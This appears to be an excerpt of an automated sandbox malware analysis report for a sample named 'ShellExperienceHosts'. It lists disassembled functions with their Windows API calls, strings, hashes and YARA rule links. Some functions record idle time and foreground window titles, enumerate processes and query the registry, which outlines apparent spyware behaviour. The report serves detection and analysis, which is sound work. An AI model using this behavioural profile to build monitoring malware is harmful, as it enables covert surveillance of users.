Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: OpenProcessValue$CloseCodeDeleteExitSleep
String ID: IpDates_info$SOFTWARE
API String ID: 864241144-2243437601
Opcode ID: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
Instruction ID: f7f7705b5b84b7b191dcdb77494346d14e222b8940c5b100b936b40375e1b217
Opcode Fuzzy Hash: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
Instruction Fuzzy Hash: B731C1306443819FF315CF308848B6B7BF6FB493C6F9944A8F5859A146D3B2DA46C761

Function 6C9D2156 Relevance: 15.1, APIs: 10, Instructions: 124memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CB8D910,?,?,?,6CB8D8F4,6CB8D8F4,?,6C9D23C0,00000004,6C9D0D08,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19), ref: 6C9D2167
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,6CB8D8F4,6CB8D8F4,?,6C9D23C0,00000004,6C9D0D08,6C9B9048,6C9C66EE,?,6C9CC267,00000004), ref: 6C9D21D9
GlobalHandle.KERNEL32(6CB8D904), ref: 6C9D21E3
GlobalUnlock.KERNEL32(00000000), ref: 6C9D21F5
GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 6C9D2210
GlobalLock.KERNEL32(00000000), ref: 6C9D221B
LeaveCriticalSection.KERNEL32(6CB8D910), ref: 6C9D2268
GlobalHandle.KERNEL32(6CB8D904), ref: 6C9D227C
GlobalLock.KERNEL32(00000000), ref: 6C9D2287
LeaveCriticalSection.KERNEL32(6CB8D910,?,?,?,6CB8D8F4,6CB8D8F4,?,6C9D23C0,00000004,6C9D0D08,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19), ref: 6C9D2296

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
String ID:
API String ID: 2667261700-0
Opcode ID: 63f04b9c35fd0261f868815b0328c070901c18202faf71c991fd0f9896101e9f
Instruction ID: 049b0998f9d410dec37396972ebc8438d61d88f49b5e6f372d9bee969b7b4b62
Opcode Fuzzy Hash: 63f04b9c35fd0261f868815b0328c070901c18202faf71c991fd0f9896101e9f
Instruction Fuzzy Hash: 1341C371A00A45AFDB18CF64C888B9AB7B8FF15304F118169F516E7940DB70FD55CB90

Function 6CB1E8B3 Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CB1E56C: CreateFileW.KERNEL32(?,00000000,?,6CB1E95C,?,?,00000000,?,6CB1E95C,?,0000000C), ref: 6CB1E589

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB1E9C7
__dosmaperr.LIBCMT ref: 6CB1E9CE
GetFileType.KERNEL32(00000000), ref: 6CB1E9DA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB1E9E4
__dosmaperr.LIBCMT ref: 6CB1E9ED
CloseHandle.KERNEL32(00000000), ref: 6CB1EA0D
CloseHandle.KERNEL32(6CB18F92), ref: 6CB1EB5A
GetLastError.KERNEL32 ref: 6CB1EB8C
__dosmaperr.LIBCMT ref: 6CB1EB93

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: cb1f018ed9e1cddf6a3995aaf3b0c219d4e2a6b1fd39086cf2e8c80d69741b06
Instruction ID: 27f0b7c40265c84ed9fe8dc47539721677e0f7f3f0545b9243bac05b2b7eb41f
Opcode Fuzzy Hash: cb1f018ed9e1cddf6a3995aaf3b0c219d4e2a6b1fd39086cf2e8c80d69741b06
Instruction Fuzzy Hash: 0AA13432A181D49FCF099F68D855BAE7BB1EB47328F180159F8019BBD0D7309916CB92

Function 032DCA70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,032F12F8,5943C5A2,00000001,00000000,00000000), ref: 032DCAB1
RegQueryInfoKeyW.ADVAPI32(032F12F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 032DCAE0
_memset.LIBCMT ref: 032DCB44
_memset.LIBCMT ref: 032DCB53
RegEnumValueW.KERNEL32(032F12F8,?,00000000,?,00000000,?,00000000,?), ref: 032DCB72

Part of subcall function 032DF707: _malloc.LIBCMT ref: 032DF721

Part of subcall function 032DF707: std::exception::exception.LIBCMT ref: 032DF756
Part of subcall function 032DF707: std::exception::exception.LIBCMT ref: 032DF770
Part of subcall function 032DF707: __CxxThrowException@8.LIBCMT ref: 032DF781

RegCloseKey.KERNEL32(032F12F8,?,?,?,?,?,?,?,?,?,?,?,00000000,032F12F8,000000FF), ref: 032DCC83

Strings

Console\0, xrefs: 032DCAA4

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
String ID: Console\0
API String ID: 1348767993-1253790388
Opcode ID: 828108619df47d0f9554cdaf88bfbc134a03554d8b5554903c1cf618349aeb1c
Instruction ID: 84e5967b8742174a686be0b2621c82af9c61b88a6f6dcaeea46d2c3fdf0f523b
Opcode Fuzzy Hash: 828108619df47d0f9554cdaf88bfbc134a03554d8b5554903c1cf618349aeb1c
Instruction Fuzzy Hash: 3C615FB5E10219AFDB04DFA8D880EEEB7B8FF48310F14416AE915EB345D774A941CBA4

Function 032DBB00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 032DF707: _malloc.LIBCMT ref: 032DF721

_memset.LIBCMT ref: 032DBB21
GetLastInputInfo.USER32(?), ref: 032DBB37
GetTickCount.KERNEL32 ref: 032DBB3D
wsprintfW.USER32 ref: 032DBB66
GetForegroundWindow.USER32 ref: 032DBB6F
GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 032DBB83

Strings

%d min, xrefs: 032DBB60

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
String ID: %d min
API String ID: 3754759880-1947832151
Opcode ID: b851743f8bf2b6f1f4e06d1a432f17b22f91cca668e07123e8e58aa9091e76c0
Instruction ID: 70afb0bfc9ea1e369965593861be4735c501ebeba5abf2db3f034920055ad8d5
Opcode Fuzzy Hash: b851743f8bf2b6f1f4e06d1a432f17b22f91cca668e07123e8e58aa9091e76c0
Instruction Fuzzy Hash: 9541A2B9D10218AFCB10EFA4D889E9FBBB8EF44710F098564F9099B345D7749A44CBE1

Function 032D6910 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(5943C5A2,00000000,00000000,75BF73E0,?,00000000,032F10DB,000000FF,?,032D6AB3,00000000), ref: 032D6938
OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,032F10DB,000000FF,?,032D6AB3,00000000), ref: 032D6947
OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,032F10DB,000000FF,?,032D6AB3,00000000), ref: 032D6960
CloseHandle.KERNEL32(00000000,?,00000000,032F10DB,000000FF,?,032D6AB3,00000000), ref: 032D696B
SysStringLen.OLEAUT32(00000000), ref: 032D69BE
SysStringLen.OLEAUT32(00000000), ref: 032D69CC
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,032F10DB,000000FF), ref: 032D6A2E
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,032F10DB,000000FF), ref: 032D6A34

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess$OpenString$CurrentToken
String ID:
API String ID: 429299433-0
Opcode ID: ebe70fa8ca874a32650e454ab87c259b6120bde5b9bd708e6490c26ea5ef5d42
Instruction ID: ae7f2a2f581c5025f95ba935012c3711a7ea8ec43b1c6c41195c2777ad5eaa7c
Opcode Fuzzy Hash: ebe70fa8ca874a32650e454ab87c259b6120bde5b9bd708e6490c26ea5ef5d42
Instruction Fuzzy Hash: 9A4106B6D50219DFDB10DFA8DC84AEEF7B8FB44310F54462AE916E7240D775A940CBA0

Function 6CAF4DA0 Relevance: 10.6, APIs: 7, Instructions: 135COMMONLIBRARYCODE

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6CAF4DE7
___scrt_uninitialize_crt.LIBCMT ref: 6CAF4E01

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 93d4d666f8c3cb009d8183e453cab65596ecf076dd1b820c791f72caa5927eca
Instruction ID: 5b79297b3299fcd5d825e697cc46ea97057fed0cdc7981aba71f86e1062f3b59
Opcode Fuzzy Hash: 93d4d666f8c3cb009d8183e453cab65596ecf076dd1b820c791f72caa5927eca
Instruction Fuzzy Hash: 1B41B472E05215AFDB11CF95DB40BDE3B75EB41B68F148515F83867B50D730898B8BA0

Function 032D6D70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89registrystringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 032D6DD9
RegOpenKeyExW.KERNEL32(80000001,032F5164,00000000,00020019,75BF73E0), ref: 032D6DFC
RegQueryValueExW.KERNEL32(75BF73E0,GROUP,00000000,00000001,?,00000208), ref: 032D6E4A
lstrcmpW.KERNEL32(?,032F5148), ref: 032D6E60
lstrcpyW.KERNEL32(032D56EA,?), ref: 032D6E72

Strings

GROUP, xrefs: 032D6E42

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: OpenQueryValue_memsetlstrcmplstrcpy
String ID: GROUP
API String ID: 2102619503-2593425013
Opcode ID: a77a0aefc745e33916470ef579d2eb2e348a3a689adbffdcfe2c4b8aedf35182
Instruction ID: 2aaaa5e26a657308670b23cc5f57a3357245bf3b3b5f32a1cfb2e3ba56b1e1cb
Opcode Fuzzy Hash: a77a0aefc745e33916470ef579d2eb2e348a3a689adbffdcfe2c4b8aedf35182
Instruction Fuzzy Hash: 2C318571910319BFDB24DF90ED8DF9EB7B8EB48720F504299E515A7180DB74AA80CF90

Function 032DFA29 Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 032DFA4E
__calloc_crt.LIBCMT ref: 032DFA5A
__getptd.LIBCMT ref: 032DFA67
CreateThread.KERNEL32(00000000,00000000,032DF9C4,00000000,00000000,032DE003), ref: 032DFA9E
GetLastError.KERNEL32(?,00000000,?,?,032DE003,00000000,00000000,032D5F40,00000000,00000000,00000000), ref: 032DFAA8
_free.LIBCMT ref: 032DFAB1
__dosmaperr.LIBCMT ref: 032DFABC

Part of subcall function 032DF91B: __getptd_noexit.LIBCMT ref: 032DF91B

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
String ID:
API String ID: 155776804-0
Opcode ID: 2ab522c99ea7f368594a0e60382653c7ceb12218d65767c71f332078e93050a4
Instruction ID: 4261931d29eb615ace4b4424af2eea884f3b5da7cc20860a9667e4fc6383a9e9
Opcode Fuzzy Hash: 2ab522c99ea7f368594a0e60382653c7ceb12218d65767c71f332078e93050a4
Instruction Fuzzy Hash: 7711E53A220717BFDB10FFA5ED41D9B37D8DF05A747184425F9168A080DBB0D88186A8

Function 1000721B Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 10007240
__calloc_crt.LIBCMT ref: 1000724C
__getptd.LIBCMT ref: 10007259
CreateThread.KERNEL32(?,?,100071B6,00000000,?,?), ref: 10007290
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 1000729A
_free.LIBCMT ref: 100072A3
__dosmaperr.LIBCMT ref: 100072AE

Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
String ID:
API String ID: 155776804-0
Opcode ID: 734b10ab9ba7f1921b38ce4142f5ff93c1ead5fd9a2afb223c48f08537fb4c8c
Instruction ID: e2e0b3d062d787f99d787063b624e9a47e01a5ceed69b34c49d3f3bc16e6f751
Opcode Fuzzy Hash: 734b10ab9ba7f1921b38ce4142f5ff93c1ead5fd9a2afb223c48f08537fb4c8c
Instruction Fuzzy Hash: C911E136604746AFF711DFA8DC41D8B37E8FF453E0B110029F95C8A19ADB79E8008AA0

Function 032D7410 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,032D7523), ref: 032D743D
GetProcAddress.KERNEL32(00000000), ref: 032D7444
GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,032D7523), ref: 032D7452
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,032D7523), ref: 032D745A

Strings

kernel32.dll, xrefs: 032D741D
GetNativeSystemInfo, xrefs: 032D7418

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: InfoSystem$AddressHandleModuleNativeProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 3433367815-192647395
Opcode ID: 51b4878ac6f43d334d0313e56ceb4339e736163b25a6019b5fe7a5d7594fdeb8
Instruction ID: 3cf91fc592120c380b69ea06a33b243cbbb74343fbd26c91e20bb44b5647e311
Opcode Fuzzy Hash: 51b4878ac6f43d334d0313e56ceb4339e736163b25a6019b5fe7a5d7594fdeb8
Instruction Fuzzy Hash: 9701ADB0D103099FCF50EFB8A9046EEBBF5EB08600F5045B9D949E3200E7398A80CFA0

Function 6CA36109 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CA36110

Part of subcall function 6C9D4C03: EnterCriticalSection.KERNEL32(6CB8DB80,?,?,?,?,6C9D2337,00000010,00000008,6C9D0D22,6C9D0D65,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19), ref: 6C9D4C34
Part of subcall function 6C9D4C03: InitializeCriticalSection.KERNEL32(00000000,?,?,?,?,6C9D2337,00000010,00000008,6C9D0D22,6C9D0D65,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19), ref: 6C9D4C4A
Part of subcall function 6C9D4C03: LeaveCriticalSection.KERNEL32(6CB8DB80,?,?,?,?,6C9D2337,00000010,00000008,6C9D0D22,6C9D0D65,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19), ref: 6C9D4C58
Part of subcall function 6C9D4C03: EnterCriticalSection.KERNEL32(00000000,?,?,?,6C9D2337,00000010,00000008,6C9D0D22,6C9D0D65,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19,00000120), ref: 6C9D4C65

GetProfileIntW.KERNEL32(windows,DragMinDist,00000002), ref: 6CA36163
GetProfileIntW.KERNEL32(windows,DragDelay,000000C8), ref: 6CA36179

Strings

windows, xrefs: 6CA3615D, 6CA36162, 6CA36173
DragDelay, xrefs: 6CA3616E
DragMinDist, xrefs: 6CA36158

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CriticalSection$EnterProfile$H_prolog3InitializeLeave
String ID: DragDelay$DragMinDist$windows
API String ID: 3965097884-2101198082
Opcode ID: dd554a51d3733fe957e9f5e65aea3bba7e682733df7667458a7bba12bbe20f3c
Instruction ID: 5dca4da28abf5f6915ac657e2f307c624ba1cb4b981f02d654712f4e4e14af1c
Opcode Fuzzy Hash: dd554a51d3733fe957e9f5e65aea3bba7e682733df7667458a7bba12bbe20f3c
Instruction Fuzzy Hash: AB0171B4A05B40DFDB60CF358A05B5ABBF0BB19704F40551DE149EBF40D7B494459F06

Function 032DF9C4 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 032DF9CA

Part of subcall function 032E3CA0: TlsGetValue.KERNEL32(00000000,032E3DF9,?,032E4500,00000000,00000001,00000000,?,032E8DE6,00000018,032F6448,0000000C,032E8E76,00000000,00000000), ref: 032E3CA9
Part of subcall function 032E3CA0: DecodePointer.KERNEL32(?,032E4500,00000000,00000001,00000000,?,032E8DE6,00000018,032F6448,0000000C,032E8E76,00000000,00000000,?,032E3F06,0000000D), ref: 032E3CBB
Part of subcall function 032E3CA0: TlsSetValue.KERNEL32(00000000,?,032E4500,00000000,00000001,00000000,?,032E8DE6,00000018,032F6448,0000000C,032E8E76,00000000,00000000,?,032E3F06), ref: 032E3CCA

___fls_getvalue@4.LIBCMT ref: 032DF9D5

Part of subcall function 032E3C80: TlsGetValue.KERNEL32(?,?,032DF9DA,00000000), ref: 032E3C8E

___fls_setvalue@8.LIBCMT ref: 032DF9E8

Part of subcall function 032E3CD4: DecodePointer.KERNEL32(?,?,?,032DF9ED,00000000,?,00000000), ref: 032E3CE5

GetLastError.KERNEL32(00000000,?,00000000), ref: 032DF9F1
ExitThread.KERNEL32 ref: 032DF9F8
GetCurrentThreadId.KERNEL32 ref: 032DF9FE
__freefls@4.LIBCMT ref: 032DFA1E

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
String ID:
API String ID: 2383549826-0
Opcode ID: e71199da25109792d259299c314d35151c7ed358293cf2704aaca81c322a10b3
Instruction ID: 66fcb143dc6f7cbbec37b1e2239b9d375f186a3d67d7e124c0cc6127e08acc7b
Opcode Fuzzy Hash: e71199da25109792d259299c314d35151c7ed358293cf2704aaca81c322a10b3
Instruction Fuzzy Hash: 9DF0907C620315BFC708FF70DA0984E7BACAF49252365D458EA0A8F201DA74D4C2CBA5

Function 100071B6 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 100071BC

Part of subcall function 10009754: TlsGetValue.KERNEL32(00000000,100098AD,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000), ref: 1000975D
Part of subcall function 10009754: DecodePointer.KERNEL32(?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA,0000000D), ref: 1000976F
Part of subcall function 10009754: TlsSetValue.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 1000977E

___fls_getvalue@4.LIBCMT ref: 100071C7

Part of subcall function 10009734: TlsGetValue.KERNEL32(?,?,100071CC,00000000), ref: 10009742

___fls_setvalue@8.LIBCMT ref: 100071DA

Part of subcall function 10009788: DecodePointer.KERNEL32(?,?,?,100071DF,00000000,?,00000000), ref: 10009799

GetLastError.KERNEL32(00000000,?,00000000), ref: 100071E3
ExitThread.KERNEL32 ref: 100071EA
GetCurrentThreadId.KERNEL32 ref: 100071F0
__freefls@4.LIBCMT ref: 10007210

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
String ID:
API String ID: 2383549826-0
Opcode ID: 9534965ccca21370a2365faca07fc43a5bbbcb8b41f594eb418147c089430495
Instruction ID: 9ef8d05c11a244158b1ee883055881acaa61a2209176cdde4bb0df2a080a06ba
Opcode Fuzzy Hash: 9534965ccca21370a2365faca07fc43a5bbbcb8b41f594eb418147c089430495
Instruction Fuzzy Hash: 7EF09679404240ABF304DFB5C94988E7BA9FF482C4725C458F90C8B21BDB39E8428790

Function 6CB14010 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2000e8f3e14a5e6c95fa2ac605f1511b75f6297e30d5212bf92f5798c88690c0
Instruction ID: 8ff3479e9d62e24df74e4f79ba75e812b3623ad550773897ee1f60be6d16f504
Opcode Fuzzy Hash: 2000e8f3e14a5e6c95fa2ac605f1511b75f6297e30d5212bf92f5798c88690c0
Instruction Fuzzy Hash: 65B1C470A082C59FDB018F98D880BAE7BB5EF5731CF144668E5549BB81C770D986CFA1

Function 6C9B2D10 Relevance: 9.2, APIs: 6, Instructions: 199processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?), ref: 6C9B2D7F
Process32FirstW.KERNEL32(00000000,?), ref: 6C9B2DC1
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 6C9B2DED
Process32NextW.KERNEL32(?,0000022C), ref: 6C9B2EF7
CloseHandle.KERNEL32(00000000,?,?), ref: 6C9B2F06

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
